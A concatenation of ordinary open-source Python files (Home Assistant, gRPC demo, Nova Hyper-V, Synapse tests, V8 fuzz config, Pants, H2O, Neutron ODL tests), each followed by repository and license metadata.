            running_instances.add(instance_num)
            if instance_num in existing_instances:
                continue
            hyperion_client = await async_create_connect_hyperion_client(
                host, port, instance=instance_num, token=token
            )
            if not hyperion_client:
                continue
            existing_instances[instance_num] = hyperion_client
            instance_name = instance.get(hyperion_const.KEY_FRIENDLY_NAME, DEFAULT_NAME)
            async_dispatcher_send(
                hass,
                SIGNAL_INSTANCE_ADD.format(entry.entry_id),
                instance_num,
                instance_name,
            )

        # Remove entities that are not running instances on Hyperion.
        for instance_num in set(existing_instances) - running_instances:
            del existing_instances[instance_num]
            async_dispatcher_send(
                hass, SIGNAL_INSTANCE_REMOVE.format(entry.entry_id), instance_num
            )

        # Ensure every device associated with this config entry is still in the
        # list of Hyperion instances, otherwise remove the device (and thus
        # entities).
        known_devices = {
            get_hyperion_device_id(server_id, instance_num)
            for instance_num in running_instances | stopped_instances
        }
        for device_entry in dr.async_entries_for_config_entry(
            device_registry, entry.entry_id
        ):
            for (kind, key) in device_entry.identifiers:
                if kind == DOMAIN and key in known_devices:
                    break
            else:
                device_registry.async_remove_device(device_entry.id)

    # Keep the instance client map in sync with server-side instance updates.
    hyperion_client.set_callbacks(
        {
            f"{hyperion_const.KEY_INSTANCE}-{hyperion_const.KEY_UPDATE}": async_instances_to_clients,
        }
    )

    async def setup_then_listen() -> None:
        """Forward setup to platforms, then process the initial instance list."""
        await asyncio.gather(
            *(
                hass.config_entries.async_forward_entry_setup(entry, platform)
                for platform in PLATFORMS
            )
        )
        assert hyperion_client
        if hyperion_client.instances is not None:
            await async_instances_to_clients_raw(hyperion_client.instances)
        hass.data[DOMAIN][entry.entry_id][CONF_ON_UNLOAD].append(
            entry.add_update_listener(_async_entry_updated)
        )

    hass.async_create_task(setup_then_listen())
    return True
async def _async_entry_updated(hass: HomeAssistant, config_entry: ConfigEntry) -> None:
    """Handle entry updates."""
    # Reload the entry so changed data/options take effect.
    await hass.config_entries.async_reload(config_entry.entry_id)
async def async_unload_entry(hass: HomeAssistant, config_entry: ConfigEntry) -> bool:
    """Unload a config entry."""
    unload_ok = await hass.config_entries.async_unload_platforms(
        config_entry, PLATFORMS
    )
    if unload_ok and config_entry.entry_id in hass.data[DOMAIN]:
        config_data = hass.data[DOMAIN].pop(config_entry.entry_id)
        # Run the teardown callables registered during setup (dispatcher
        # disconnects, update listener removal).
        for func in config_data[CONF_ON_UNLOAD]:
            func()

        # Disconnect the shared instance clients.
        await asyncio.gather(
            *(
                config_data[CONF_INSTANCE_CLIENTS][
                    instance_num
                ].async_client_disconnect()
                for instance_num in config_data[CONF_INSTANCE_CLIENTS]
            )
        )

        # Disconnect the root client.
        root_client = config_data[CONF_ROOT_CLIENT]
        await root_client.async_client_disconnect()
    return unload_ok
| sander76/home-assistant | homeassistant/components/hyperion/__init__.py | Python | apache-2.0 | 11,527 |
# Copyright 2019 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The example of four ways of data transmission using gRPC in Python."""
from threading import Thread
from concurrent import futures
import grpc
import demo_pb2_grpc
import demo_pb2
__all__ = 'DemoServer'
SERVER_ADDRESS = 'localhost:23333'
SERVER_ID = 1
class DemoServer(demo_pb2_grpc.GRPCDemoServicer):
    """Demo servicer implementing the four gRPC call types."""

    # unary-unary (In a single call, the client can only send request once,
    # and the server can only respond once.)
    def SimpleMethod(self, request, context):
        print("SimpleMethod called by client(%d) the message: %s" %
              (request.client_id, request.request_data))
        response = demo_pb2.Response(
            server_id=SERVER_ID,
            response_data="Python server SimpleMethod Ok!!!!")
        return response

    # stream-unary (In a single call, the client can transfer data to the
    # server several times, but the server can only return a response once.)
    def ClientStreamingMethod(self, request_iterator, context):
        print("ClientStreamingMethod called by client...")
        for request in request_iterator:
            print("recv from client(%d), message= %s" %
                  (request.client_id, request.request_data))
        response = demo_pb2.Response(
            server_id=SERVER_ID,
            response_data="Python server ClientStreamingMethod ok")
        return response

    # unary-stream (In a single call, the client can only transmit data to the
    # server at one time, but the server can return the response many times.)
    def ServerStreamingMethod(self, request, context):
        print("ServerStreamingMethod called by client(%d), message= %s" %
              (request.client_id, request.request_data))

        # create a generator
        def response_messages():
            for i in range(5):
                response = demo_pb2.Response(
                    server_id=SERVER_ID,
                    response_data=("send by Python server, message=%d" % i))
                yield response

        return response_messages()

    # stream-stream (In a single call, both client and server can send and
    # receive data to each other multiple times.)
    def BidirectionalStreamingMethod(self, request_iterator, context):
        print("BidirectionalStreamingMethod called by client...")

        # Open a sub thread to receive data
        def parse_request():
            for request in request_iterator:
                print("recv from client(%d), message= %s" %
                      (request.client_id, request.request_data))

        t = Thread(target=parse_request)
        t.start()

        for i in range(5):
            yield demo_pb2.Response(
                server_id=SERVER_ID,
                response_data=("send by Python server, message= %d" % i))

        t.join()
def main():
    """Build, configure and run the demo gRPC server until terminated."""
    thread_pool = futures.ThreadPoolExecutor()
    server = grpc.server(thread_pool)
    demo_pb2_grpc.add_GRPCDemoServicer_to_server(DemoServer(), server)
    server.add_insecure_port(SERVER_ADDRESS)
    print("------------------start Python GRPC server")
    server.start()
    # Block the main thread until the server is stopped.  On old grpcio
    # releases without ``wait_for_termination`` (AttributeError: '_Server'
    # object has no attribute 'wait_for_termination'), replace the call
    # below with:  import time;  while 1: time.sleep(10)
    server.wait_for_termination()
if __name__ == '__main__':
    main()
| jboeuf/grpc | examples/python/data_transmission/server.py | Python | apache-2.0 | 4,492 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Pedro Navarro Perez
# Copyright 2013 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for Storage-related functions (attach, detach, etc).
"""
import time
from oslo.config import cfg
from nova import exception
from nova.openstack.common import log as logging
from nova.virt import driver
from nova.virt.hyperv import hostutils
from nova.virt.hyperv import vmutils
from nova.virt.hyperv import volumeutils
from nova.virt.hyperv import volumeutilsv2
LOG = logging.getLogger(__name__)
# Configuration options controlling volume attachment behaviour; registered
# below under the ``hyperv`` option group.
hyper_volumeops_opts = [
    cfg.IntOpt('volume_attach_retry_count',
               default=10,
               help='The number of times to retry to attach a volume'),
    cfg.IntOpt('volume_attach_retry_interval',
               default=5,
               help='Interval between volume attachment attempts, in seconds'),
    cfg.BoolOpt('force_volumeutils_v1',
                default=False,
                help='Force volumeutils v1'),
]
CONF = cfg.CONF
CONF.register_opts(hyper_volumeops_opts, 'hyperv')
# ``my_ip`` is defined by nova.netconf and reused in get_volume_connector().
CONF.import_opt('my_ip', 'nova.netconf')
class VolumeOps(object):
    """
    Management class for Volume-related tasks
    """

    def __init__(self):
        self._hostutils = hostutils.HostUtils()
        self._vmutils = vmutils.VMUtils()
        self._volutils = self._get_volume_utils()
        self._initiator = None
        self._default_root_device = 'vda'

    def _get_volume_utils(self):
        """Return the volume utils implementation matching the host OS."""
        if(not CONF.hyperv.force_volumeutils_v1 and
           self._hostutils.get_windows_version() >= 6.2):
            return volumeutilsv2.VolumeUtilsV2()
        else:
            return volumeutils.VolumeUtils()

    def ebs_root_in_block_devices(self, block_device_info):
        """Return True when the default root device is in the mapping."""
        return self._volutils.volume_in_mapping(self._default_root_device,
                                                block_device_info)

    def attach_volumes(self, block_device_info, instance_name, ebs_root):
        """Attach every mapped volume; the first one as boot disk if ebs_root."""
        mapping = driver.block_device_info_get_mapping(block_device_info)
        if ebs_root:
            self.attach_volume(mapping[0]['connection_info'],
                               instance_name, True)
            mapping = mapping[1:]
        for vol in mapping:
            self.attach_volume(vol['connection_info'], instance_name)

    def login_storage_targets(self, block_device_info):
        """Login to the iSCSI target of every volume in the mapping."""
        mapping = driver.block_device_info_get_mapping(block_device_info)
        for vol in mapping:
            self._login_storage_target(vol['connection_info'])

    def _login_storage_target(self, connection_info):
        """Login to an iSCSI target unless a session already exists."""
        data = connection_info['data']
        target_lun = data['target_lun']
        target_iqn = data['target_iqn']
        target_portal = data['target_portal']
        # Check if we already logged in
        if self._volutils.get_device_number_for_target(target_iqn, target_lun):
            LOG.debug(_("Already logged in on storage target. No need to "
                        "login. Portal: %(target_portal)s, "
                        "IQN: %(target_iqn)s, LUN: %(target_lun)s") % locals())
        else:
            LOG.debug(_("Logging in on storage target. Portal: "
                        "%(target_portal)s, IQN: %(target_iqn)s, "
                        "LUN: %(target_lun)s") % locals())
            self._volutils.login_storage_target(target_lun, target_iqn,
                                                target_portal)
            # Wait for the target to be mounted
            self._get_mounted_disk_from_lun(target_iqn, target_lun, True)

    def attach_volume(self, connection_info, instance_name, ebs_root=False):
        """
        Attach a volume to the SCSI controller or to the IDE controller if
        ebs_root is True
        """
        LOG.debug(_("Attach_volume: %(connection_info)s to %(instance_name)s")
                  % locals())
        # Extract the target details BEFORE the try block so the except
        # clause can always log out of the target: previously a failure
        # inside _login_storage_target() made the handler raise NameError
        # on target_iqn, masking the original error.
        data = connection_info['data']
        target_lun = data['target_lun']
        target_iqn = data['target_iqn']
        try:
            self._login_storage_target(connection_info)
            #Getting the mounted disk
            mounted_disk_path = self._get_mounted_disk_from_lun(target_iqn,
                                                                target_lun)
            if ebs_root:
                #Find the IDE controller for the vm.
                ctrller_path = self._vmutils.get_vm_ide_controller(
                    instance_name, 0)
                #Attaching to the first slot
                slot = 0
            else:
                #Find the SCSI controller for the vm
                ctrller_path = self._vmutils.get_vm_scsi_controller(
                    instance_name)
                slot = self._get_free_controller_slot(ctrller_path)
            self._vmutils.attach_volume_to_controller(instance_name,
                                                      ctrller_path,
                                                      slot,
                                                      mounted_disk_path)
        except Exception as exn:
            LOG.exception(_('Attach volume failed: %s'), exn)
            self._volutils.logout_storage_target(target_iqn)
            raise vmutils.HyperVException(_('Unable to attach volume '
                                            'to instance %s') % instance_name)

    def _get_free_controller_slot(self, scsi_controller_path):
        #Slots start from 0, so the length of the disks gives us the free slot
        return self._vmutils.get_attached_disks_count(scsi_controller_path)

    def detach_volumes(self, block_device_info, instance_name):
        """Detach every mapped volume from the instance."""
        mapping = driver.block_device_info_get_mapping(block_device_info)
        for vol in mapping:
            self.detach_volume(vol['connection_info'], instance_name)

    def logout_storage_target(self, target_iqn):
        """Logout of the iSCSI session for the given target IQN."""
        LOG.debug(_("Logging off storage target %(target_iqn)s") % locals())
        self._volutils.logout_storage_target(target_iqn)

    def detach_volume(self, connection_info, instance_name):
        """Detach a volume from the SCSI controller."""
        LOG.debug(_("Detach_volume: %(connection_info)s "
                    "from %(instance_name)s") % locals())
        data = connection_info['data']
        target_lun = data['target_lun']
        target_iqn = data['target_iqn']
        #Getting the mounted disk
        mounted_disk_path = self._get_mounted_disk_from_lun(target_iqn,
                                                            target_lun)
        LOG.debug(_("Detaching physical disk from instance: %s"),
                  mounted_disk_path)
        self._vmutils.detach_vm_disk(instance_name, mounted_disk_path)
        self.logout_storage_target(target_iqn)

    def get_volume_connector(self, instance):
        """Return this host's iSCSI connector info (ip + initiator name)."""
        if not self._initiator:
            self._initiator = self._volutils.get_iscsi_initiator()
            if not self._initiator:
                LOG.warn(_('Could not determine iscsi initiator name'),
                         instance=instance)
        return {
            'ip': CONF.my_ip,
            'initiator': self._initiator,
        }

    def _get_mounted_disk_from_lun(self, target_iqn, target_lun,
                                   wait_for_device=False):
        """Return the mounted disk path for a LUN, optionally retrying."""
        device_number = self._volutils.get_device_number_for_target(target_iqn,
                                                                    target_lun)
        if device_number is None:
            raise exception.NotFound(_('Unable to find a mounted disk for '
                                       'target_iqn: %s') % target_iqn)
        LOG.debug(_('Device number: %(device_number)s, '
                    'target lun: %(target_lun)s') % locals())
        #Finding Mounted disk drive
        # Initialize so the check below cannot hit an unbound local when
        # volume_attach_retry_count is configured to 0.
        mounted_disk_path = None
        for i in range(0, CONF.hyperv.volume_attach_retry_count):
            mounted_disk_path = self._vmutils.get_mounted_disk_by_drive_number(
                device_number)
            if mounted_disk_path or not wait_for_device:
                break
            time.sleep(CONF.hyperv.volume_attach_retry_interval)
        if not mounted_disk_path:
            raise exception.NotFound(_('Unable to find a mounted disk '
                                       'for target_iqn: %s') % target_iqn)
        return mounted_disk_path

    def disconnect_volume(self, physical_drive_path):
        """Logout of the iSCSI session backing the given physical drive."""
        #Get the session_id of the ISCSI connection
        session_id = self._volutils.get_session_id_from_mounted_disk(
            physical_drive_path)
        #Logging out the target
        self._volutils.execute_log_out(session_id)

    def get_target_from_disk_path(self, physical_drive_path):
        """Return the (iqn, lun) target backing the given physical drive."""
        return self._volutils.get_target_from_disk_path(physical_drive_path)
| zestrada/nova-cs498cc | nova/virt/hyperv/volumeops.py | Python | apache-2.0 | 9,291 |
# -*- coding: utf-8 -*-
# Copyright 2014 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# twisted imports
from twisted.internet import defer
# trial imports
from tests import unittest
from synapse.api.constants import Membership
import json
import time
class RestTestCase(unittest.TestCase):
    """Contains extra helper functions to quickly and clearly perform a given
    REST action, which isn't the focus of the test.
    This subclass assumes there are mock_resource and auth_user_id attributes.
    """
    def __init__(self, *args, **kwargs):
        super(RestTestCase, self).__init__(*args, **kwargs)
        # Filled in by the concrete test case before the helpers are used.
        self.mock_resource = None
        self.auth_user_id = None
    def mock_get_user_by_token(self, token=None):
        """Stand-in auth hook: every token maps to the configured user."""
        return self.auth_user_id
    @defer.inlineCallbacks
    def create_room_as(self, room_creator, is_public=True, tok=None):
        """Create a room acting as *room_creator*; returns the room_id."""
        # Temporarily impersonate the creator, restore afterwards.
        temp_id = self.auth_user_id
        self.auth_user_id = room_creator
        path = "/createRoom"
        content = "{}"
        if not is_public:
            content = '{"visibility":"private"}'
        if tok:
            path = path + "?access_token=%s" % tok
        (code, response) = yield self.mock_resource.trigger("POST", path, content)
        self.assertEquals(200, code, msg=str(response))
        self.auth_user_id = temp_id
        defer.returnValue(response["room_id"])
    @defer.inlineCallbacks
    def invite(self, room=None, src=None, targ=None, expect_code=200, tok=None):
        """Invite *targ* to *room* on behalf of *src*."""
        yield self.change_membership(room=room, src=src, targ=targ, tok=tok,
                                     membership=Membership.INVITE,
                                     expect_code=expect_code)
    @defer.inlineCallbacks
    def join(self, room=None, user=None, expect_code=200, tok=None):
        """Join *room* as *user*."""
        yield self.change_membership(room=room, src=user, targ=user, tok=tok,
                                     membership=Membership.JOIN,
                                     expect_code=expect_code)
    @defer.inlineCallbacks
    def leave(self, room=None, user=None, expect_code=200, tok=None):
        """Leave *room* as *user*."""
        yield self.change_membership(room=room, src=user, targ=user, tok=tok,
                                     membership=Membership.LEAVE,
                                     expect_code=expect_code)
    @defer.inlineCallbacks
    def change_membership(self, room, src, targ, membership, tok=None,
                          expect_code=200):
        """PUT an m.room.member state event for *targ*, acting as *src*."""
        temp_id = self.auth_user_id
        self.auth_user_id = src
        path = "/rooms/%s/state/m.room.member/%s" % (room, targ)
        if tok:
            path = path + "?access_token=%s" % tok
        data = {
            "membership": membership
        }
        (code, response) = yield self.mock_resource.trigger("PUT", path,
                                                            json.dumps(data))
        self.assertEquals(expect_code, code, msg=str(response))
        self.auth_user_id = temp_id
    @defer.inlineCallbacks
    def register(self, user_id):
        """Register *user_id* with a fixed password; returns the response."""
        (code, response) = yield self.mock_resource.trigger(
            "POST",
            "/register",
            json.dumps({
                "user": user_id,
                "password": "test",
                "type": "m.login.password"
            }))
        self.assertEquals(200, code)
        defer.returnValue(response)
    @defer.inlineCallbacks
    def send(self, room_id, body=None, txn_id=None, tok=None,
             expect_code=200):
        """Send an m.text message into *room_id*."""
        if txn_id is None:
            # Transaction ids only need to be unique per access token.
            txn_id = "m%s" % (str(time.time()))
        if body is None:
            body = "body_text_here"
        path = "/rooms/%s/send/m.room.message/%s" % (room_id, txn_id)
        content = '{"msgtype":"m.text","body":"%s"}' % body
        if tok:
            path = path + "?access_token=%s" % tok
        (code, response) = yield self.mock_resource.trigger("PUT", path, content)
        self.assertEquals(expect_code, code, msg=str(response))
    def assert_dict(self, required, actual):
        """Does a partial assert of a dict.
        Args:
            required (dict): The keys and value which MUST be in 'actual'.
            actual (dict): The test result. Extra keys will not be checked.
        """
        for key in required:
            self.assertEquals(required[key], actual[key],
                              msg="%s mismatch. %s" % (key, actual))
# Copyright 2018 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import random
# List of configuration experiments for correctness fuzzing.
# List of <probability>, <1st config name>, <2nd config name>, <2nd d8>.
# Probabilities must add up to 100.
# Each row weights one A/B experiment; the second config runs on the d8
# binary named in the last column.
FOOZZIE_EXPERIMENTS = [
  [10, 'ignition', 'jitless', 'd8'],
  [10, 'ignition', 'slow_path', 'd8'],
  [5, 'ignition', 'slow_path_opt', 'd8'],
  [30, 'ignition', 'ignition_turbo', 'd8'],
  [20, 'ignition', 'ignition_turbo_opt', 'd8'],
  [5, 'ignition_turbo_opt', 'ignition_turbo_opt', 'clang_x86/d8'],
  [5, 'ignition_turbo', 'ignition_turbo', 'clang_x86/d8'],
  [5, 'ignition', 'ignition', 'clang_x86/d8'],
  [5, 'ignition', 'ignition', 'clang_x64_v8_arm64/d8'],
  [5, 'ignition', 'ignition', 'clang_x86_v8_arm/d8'],
]
class Config(object):
  def __init__(self, name, rng=None):
    """Create a fuzz configuration chooser.

    Args:
      name: Name of this configuration (informational only).
      rng: Optional random.Random instance, injectable for testing.
    """
    self.name = name
    self.rng = rng or random.Random()

  def choose_foozzie_flags(self):
    """Randomly chooses a configuration from FOOZZIE_EXPERIMENTS.

    Returns: List of flags to pass to v8_foozzie.py fuzz harness.
    """
    acc = 0
    threshold = self.rng.random() * 100
    for prob, first_config, second_config, second_d8 in FOOZZIE_EXPERIMENTS:
      acc += prob
      if acc > threshold:
        return [
          '--first-config=' + first_config,
          '--second-config=' + second_config,
          '--second-d8=' + second_d8,
        ]
    # Unreachable while the probabilities add up to 100.  Raise explicitly
    # instead of ``assert False``: asserts are stripped under python -O,
    # which would make a misconfigured table silently return None here.
    raise AssertionError('FOOZZIE_EXPERIMENTS probabilities do not sum to 100')
| weolar/miniblink49 | v8_7_5/tools/clusterfuzz/v8_fuzz_config.py | Python | apache-2.0 | 1,510 |
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants_test.pants_run_integration_test import PantsRunIntegrationTest
class ScroogeGenTest(PantsRunIntegrationTest):
  """Integration tests running scrooge_gen over a set of thrift fixtures."""

  @classmethod
  def hermetic(cls):
    # Run pants without inheriting the caller's environment/config.
    return True

  def run_pants(self, command, config=None, stdin_data=None, extra_env=None, **kwargs):
    """Run pants with the scrooge backend enabled, merging in extra config."""
    merged = {
      'GLOBAL': {
        'pythonpath': ["%(buildroot)s/contrib/scrooge/src/python"],
        'backend_packages': ["pants.backend.codegen", "pants.backend.jvm", "pants.contrib.scrooge"]
      },
    }
    if config:
      for scope, scoped_cfgs in config.items():
        scope_cfg = merged.setdefault(scope, {})
        scope_cfg.update(scoped_cfgs)
    return super(ScroogeGenTest, self).run_pants(command, merged, stdin_data, extra_env,
                                                 **kwargs)

  @staticmethod
  def thrift_test_target(name):
    """Return the address of a fixture target in the scrooge_gen test dir."""
    prefix = 'contrib/scrooge/tests/thrift/org/pantsbuild/contrib/scrooge/scrooge_gen:'
    return prefix + name

  def _assert_gen_succeeds(self, target_name):
    """Run `gen` over the named fixture target and assert it succeeds."""
    pants_run = self.run_pants(['gen', self.thrift_test_target(target_name)])
    self.assert_success(pants_run)

  def test_good(self):
    # scrooge_gen should pass with correct thrift files.
    self._assert_gen_succeeds('good-thrift')

  def test_namespace_map(self):
    # scrooge_gen should pass with namespace_map specified.
    self._assert_gen_succeeds('namespace-map-thrift')

  def test_default_java_namespace(self):
    # scrooge_gen should pass with default_java_namespace specified.
    self._assert_gen_succeeds('default-java-namespace-thrift')

  def test_include_paths(self):
    # scrooge_gen should pass with include_paths specified.
    self._assert_gen_succeeds('include-paths-thrift')
| pombredanne/pants | contrib/scrooge/tests/python/pants_test/contrib/scrooge/tasks/test_scrooge_gen_integration.py | Python | apache-2.0 | 2,191 |
# Specify the response and predictor columns
y = "C785"
x = train.names[0:784]
# We encode the response column as categorical for multinomial classification
train[y] = train[y].asfactor()
test[y] = test[y].asfactor()
# Train a Deep Learning model and validate on a test set
# (three hidden layers of 200 rectifier-with-dropout units, 20% input
# dropout, light L1 regularization, 10 epochs; presumably `train`/`test`
# are MNIST frames loaded earlier in the booklet -- confirm against the
# surrounding example code)
model = h2o.deeplearning(x=x,
                         y=y,
                         training_frame=train,
                         validation_frame=test,
                         distribution="multinomial",
                         activation="RectifierWithDropout",
                         hidden=[200,200,200],
                         input_dropout_ratio=0.2,
                         l1=1e-5,
                         epochs=10)
| printedheart/h2o-3 | h2o-docs/src/booklets/v2_2015/source/deeplearning/deeplearning_examplerun.py | Python | apache-2.0 | 719 |
# Copyright (c) 2013-2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Kyle Mestery, Cisco Systems, Inc.
import mock
import requests
from neutron.plugins.common import constants
from neutron.plugins.ml2 import config as config
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.ml2.drivers import mechanism_odl
from neutron.plugins.ml2 import plugin
from neutron.tests import base
from neutron.tests.unit import test_db_plugin as test_plugin
from neutron.tests.unit import testlib_api
# Dotted path of the ML2 core plugin handed to the test base class setUp().
PLUGIN_NAME = 'neutron.plugins.ml2.plugin.Ml2Plugin'
class OpenDaylightTestCase(test_plugin.NeutronDbPluginV2TestCase):
    def setUp(self):
        """Configure ML2 with the OpenDaylight mechanism driver enabled."""
        # Enable the test mechanism driver to ensure that
        # we can successfully call through to all mechanism
        # driver apis.
        config.cfg.CONF.set_override('mechanism_drivers',
                                     ['logger', 'opendaylight'],
                                     'ml2')
        # Set URL/user/pass so init doesn't throw a cfg required error.
        # They are not used in these tests since sendjson is overwritten.
        config.cfg.CONF.set_override('url', 'http://127.0.0.1:9999', 'ml2_odl')
        config.cfg.CONF.set_override('username', 'someuser', 'ml2_odl')
        config.cfg.CONF.set_override('password', 'somepass', 'ml2_odl')
        super(OpenDaylightTestCase, self).setUp(PLUGIN_NAME)
        self.port_create_status = 'DOWN'
        # Use the api.NETWORK_TYPE constant as the key: the original used
        # the literal string 'api.NETWORK_TYPE', creating a dead key that
        # no reader (all use segment[api.NETWORK_TYPE]) ever consulted.
        self.segment = {api.NETWORK_TYPE: ""}
        self.mech = mechanism_odl.OpenDaylightMechanismDriver()
        mechanism_odl.OpenDaylightMechanismDriver.sendjson = (
            self.check_sendjson)

    def check_sendjson(self, method, urlpath, obj, ignorecodes=[]):
        """sendjson stub: assert the url path is relative; send nothing."""
        self.assertFalse(urlpath.startswith("http://"))

    def test_check_segment(self):
        """Validate the check_segment call."""
        self.segment[api.NETWORK_TYPE] = constants.TYPE_LOCAL
        self.assertTrue(self.mech.check_segment(self.segment))
        self.segment[api.NETWORK_TYPE] = constants.TYPE_FLAT
        self.assertFalse(self.mech.check_segment(self.segment))
        self.segment[api.NETWORK_TYPE] = constants.TYPE_VLAN
        self.assertTrue(self.mech.check_segment(self.segment))
        self.segment[api.NETWORK_TYPE] = constants.TYPE_GRE
        self.assertTrue(self.mech.check_segment(self.segment))
        self.segment[api.NETWORK_TYPE] = constants.TYPE_VXLAN
        self.assertTrue(self.mech.check_segment(self.segment))
        # Validate a network type not currently supported
        self.segment[api.NETWORK_TYPE] = 'mpls'
        self.assertFalse(self.mech.check_segment(self.segment))
class OpenDayLightMechanismConfigTests(testlib_api.SqlTestCase):
    """Checks that the ML2 plugin refuses to load without ODL credentials."""

    def _set_config(self, url='http://127.0.0.1:9999', username='someuser',
                    password='somepass'):
        config.cfg.CONF.set_override('mechanism_drivers',
                                     ['logger', 'opendaylight'],
                                     'ml2')
        for option, value in (('url', url),
                              ('username', username),
                              ('password', password)):
            config.cfg.CONF.set_override(option, value, 'ml2_odl')

    def _test_missing_config(self, **kwargs):
        # Any option overridden to None must make plugin init fail.
        self._set_config(**kwargs)
        self.assertRaises(config.cfg.RequiredOptError, plugin.Ml2Plugin)

    def test_valid_config(self):
        self._set_config()
        plugin.Ml2Plugin()

    def test_missing_url_raises_exception(self):
        self._test_missing_config(url=None)

    def test_missing_username_raises_exception(self):
        self._test_missing_config(username=None)

    def test_missing_password_raises_exception(self):
        self._test_missing_config(password=None)
# The subclasses below re-run the generic ML2 plugin test suites with the
# OpenDaylight mechanism driver enabled by OpenDaylightTestCase.setUp().
class OpenDaylightMechanismTestBasicGet(test_plugin.TestBasicGet,
                                        OpenDaylightTestCase):
    pass
class OpenDaylightMechanismTestNetworksV2(test_plugin.TestNetworksV2,
                                          OpenDaylightTestCase):
    pass
class OpenDaylightMechanismTestSubnetsV2(test_plugin.TestSubnetsV2,
                                         OpenDaylightTestCase):
    pass
class OpenDaylightMechanismTestPortsV2(test_plugin.TestPortsV2,
                                       OpenDaylightTestCase):
    pass
class AuthMatcher(object):
    """Mock-call matcher equal to any auth object whose username/password
    match the ml2_odl configuration."""

    def __eq__(self, obj):
        return (obj.username == config.cfg.CONF.ml2_odl.username and
                obj.password == config.cfg.CONF.ml2_odl.password)

    def __ne__(self, obj):
        # Python 2 does not derive __ne__ from __eq__; define it so that
        # inequality checks stay consistent with the equality above.
        return not self.__eq__(obj)
class OpenDaylightMechanismDriverTestCase(base.BaseTestCase):
    def setUp(self):
        """Instantiate and initialize the driver with dummy credentials."""
        super(OpenDaylightMechanismDriverTestCase, self).setUp()
        config.cfg.CONF.set_override('mechanism_drivers',
                                     ['logger', 'opendaylight'], 'ml2')
        config.cfg.CONF.set_override('url', 'http://127.0.0.1:9999', 'ml2_odl')
        config.cfg.CONF.set_override('username', 'someuser', 'ml2_odl')
        config.cfg.CONF.set_override('password', 'somepass', 'ml2_odl')
        self.mech = mechanism_odl.OpenDaylightMechanismDriver()
        self.mech.initialize()
    @staticmethod
    def _get_mock_delete_resource_context():
        # Minimal driver context: only current['id'] is used on delete.
        current = {'id': '00000000-1111-2222-3333-444444444444'}
        context = mock.Mock(current=current)
        return context
    # HTTP status codes mapped to the message requests raises for them.
    _status_code_msgs = {
        204: '',
        401: '401 Client Error: Unauthorized',
        403: '403 Client Error: Forbidden',
        404: '404 Client Error: Not Found',
        409: '409 Client Error: Conflict',
        501: '501 Server Error: Not Implemented'
    }
    @classmethod
    def _get_mock_request_response(cls, status_code):
        # Mirror requests behaviour: raise_for_status is a no-op below 400
        # and raises HTTPError at/above 400.
        response = mock.Mock(status_code=status_code)
        response.raise_for_status = mock.Mock() if status_code < 400 else (
            mock.Mock(side_effect=requests.exceptions.HTTPError(
                cls._status_code_msgs[status_code])))
        return response
    def _test_delete_resource_postcommit(self, object_type, status_code,
                                         exc_class=None):
        """Call delete_<object_type>_postcommit against a canned response
        and verify the DELETE request issued to the ODL controller."""
        self.mech.out_of_sync = False
        method = getattr(self.mech, 'delete_%s_postcommit' % object_type)
        context = self._get_mock_delete_resource_context()
        request_response = self._get_mock_request_response(status_code)
        with mock.patch('requests.request',
                        return_value=request_response) as mock_method:
            if exc_class is not None:
                self.assertRaises(exc_class, method, context)
            else:
                method(context)
        url = '%s/%ss/%s' % (config.cfg.CONF.ml2_odl.url, object_type,
                             context.current['id'])
        mock_method.assert_called_once_with(
            'delete', url=url, headers={'Content-Type': 'application/json'},
            data=None, auth=AuthMatcher(),
            timeout=config.cfg.CONF.ml2_odl.timeout)
    def test_delete_network_postcommit(self):
        self._test_delete_resource_postcommit('network',
                                              requests.codes.no_content)
        for status_code in (requests.codes.unauthorized,
                            requests.codes.not_found,
                            requests.codes.conflict):
            self._test_delete_resource_postcommit(
                'network', status_code, requests.exceptions.HTTPError)
    def test_delete_subnet_postcommit(self):
        self._test_delete_resource_postcommit('subnet',
                                              requests.codes.no_content)
        for status_code in (requests.codes.unauthorized,
                            requests.codes.not_found,
                            requests.codes.conflict,
                            requests.codes.not_implemented):
            self._test_delete_resource_postcommit(
                'subnet', status_code, requests.exceptions.HTTPError)
    def test_delete_port_postcommit(self):
        self._test_delete_resource_postcommit('port',
                                              requests.codes.no_content)
        for status_code in (requests.codes.unauthorized,
                            requests.codes.forbidden,
                            requests.codes.not_found,
                            requests.codes.not_implemented):
            self._test_delete_resource_postcommit(
                'port', status_code, requests.exceptions.HTTPError)
